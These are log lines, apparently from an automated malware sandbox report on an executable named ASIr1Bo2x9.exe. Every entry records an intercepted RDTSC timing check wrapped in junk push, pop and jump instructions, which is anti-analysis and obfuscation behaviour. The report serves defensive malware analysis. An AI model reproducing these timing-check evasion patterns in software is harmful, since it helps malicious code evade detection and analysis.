    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1104A45 second address: 1104A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11085C6 second address: 11085D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F30F50FDE26h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11085D5 second address: 11085D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11085D9 second address: 11085F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F50FDE33h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11085F2 second address: 11085F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11085F7 second address: 1108623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F30F50FDE26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F30F50FDE39h 0x00000012 jns 00007F30F50FDE26h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1108623 second address: 1108640 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F30F4CF343Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jl 00007F30F4CF3436h 0x00000016 pop ecx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1108640 second address: 1108645 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 110D5A2 second address: 110D5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 110DAF0 second address: 110DB13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b jmp 00007F30F50FDE2Fh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 110DF3F second address: 110DF4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F4CF343Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 110D0E2 second address: 110D0E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 110D0E8 second address: 110D10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F30F4CF3444h 0x0000000d jnl 00007F30F4CF3436h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1111813 second address: 1111828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE2Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1111828 second address: 111182C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 111182C second address: 111183A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 111183A second address: 111183E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1113FDF second address: 1113FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F30F50FDE26h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1113B81 second address: 1113B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1113B87 second address: 1113B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1113B8B second address: 1113B97 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F30F4CF3436h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1113B97 second address: 1113BA1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F30F50FDE2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1113BA1 second address: 1113BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 111A676 second address: 111A680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F30F50FDE26h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1078431 second address: 1078435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1078435 second address: 107844B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 107844B second address: 107846A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F30F4CF3448h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 107846A second address: 1078489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jc 00007F30F50FDE26h 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F30F50FDE26h 0x00000019 js 00007F30F50FDE26h 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1078489 second address: 1078499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 ja 00007F30F4CF3436h 0x0000000f pop ecx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1078499 second address: 107849F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1118FD1 second address: 1118FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 111955E second address: 1119564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1119564 second address: 111956A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11196C6 second address: 11196CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11196CC second address: 1119705 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F30F4CF3448h 0x0000000f jmp 00007F30F4CF3447h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1119705 second address: 1119717 instructions: 0x00000000 rdtsc 0x00000002 js 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F30F50FDE26h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 111EFC5 second address: 111EFE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 111E5F3 second address: 111E5F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 111E775 second address: 111E779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 111E91B second address: 111E93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F30F50FDE39h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 111E93C second address: 111E942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11214BB second address: 11214BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1121769 second address: 112176F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 112176F second address: 1121773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1121773 second address: 1121794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F30F4CF3449h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11219FA second address: 11219FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1128D83 second address: 1128D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1128D8B second address: 1128DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F30F50FDE2Bh 0x0000000d jmp 00007F30F50FDE38h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1128DB8 second address: 1128DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1126E97 second address: 1126EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1126EA0 second address: 1126EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11274A0 second address: 11274A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11274A6 second address: 11274B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F30F4CF3436h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11274B2 second address: 11274C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F30F50FDE2Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1127CEF second address: 1127CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1127CF3 second address: 1127D03 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F30F50FDE26h 0x00000008 jnc 00007F30F50FDE26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1128AB3 second address: 1128AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F30F4CF343Dh 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 jng 00007F30F4CF343Eh 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 112D930 second address: 112D93A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F30F50FDE2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 112CBAA second address: 112CBCB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F30F4CF344Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 112CD30 second address: 112CD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jnl 00007F30F50FDE26h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 112CE8B second address: 112CE8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 112D521 second address: 112D52C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1131FF0 second address: 1131FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1131FF4 second address: 1131FFD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1133624 second address: 1133628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113CD72 second address: 113CD78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113B2F7 second address: 113B2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113B2FB second address: 113B2FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113B2FF second address: 113B310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F30F4CF3436h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113BA74 second address: 113BA79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113BA79 second address: 113BA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113BA7F second address: 113BA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F50FDE31h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113BC3E second address: 113BC58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3446h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113CB89 second address: 113CBA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F30F50FDE39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 113CBA8 second address: 113CBBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF343Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143DB1 second address: 1143DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143DB5 second address: 1143DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F4CF343Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143DCA second address: 1143DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143794 second address: 11437A6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F30F4CF3436h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 114392B second address: 1143944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Eh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143944 second address: 1143962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F30F4CF3446h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143962 second address: 1143986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F30F50FDE37h 0x0000000a jnc 00007F30F50FDE2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1154505 second address: 115450D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1153F12 second address: 1153F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11599C4 second address: 11599C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11599C8 second address: 11599D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11633BA second address: 1163403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3445h 0x00000007 push edi 0x00000008 jmp 00007F30F4CF343Ch 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F30F4CF343Ch 0x00000018 pushad 0x00000019 jc 00007F30F4CF3436h 0x0000001f jno 00007F30F4CF3436h 0x00000025 jnp 00007F30F4CF3436h 0x0000002b popad 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116A4B6 second address: 116A4C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1168EA3 second address: 1168EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F30F4CF3436h 0x0000000e push edi 0x0000000f pop edi 0x00000010 jo 00007F30F4CF3436h 0x00000016 popad 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116943E second address: 1169459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F50FDE37h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11695E6 second address: 11695EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116A23A second address: 116A23E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116DCB3 second address: 116DCB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116DCB8 second address: 116DCBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11700E1 second address: 11700FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F30F4CF3446h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116FF8B second address: 116FF8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116FF8F second address: 116FF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1171743 second address: 117174B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117174B second address: 117175D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F30F4CF3436h 0x00000012 rdtsc
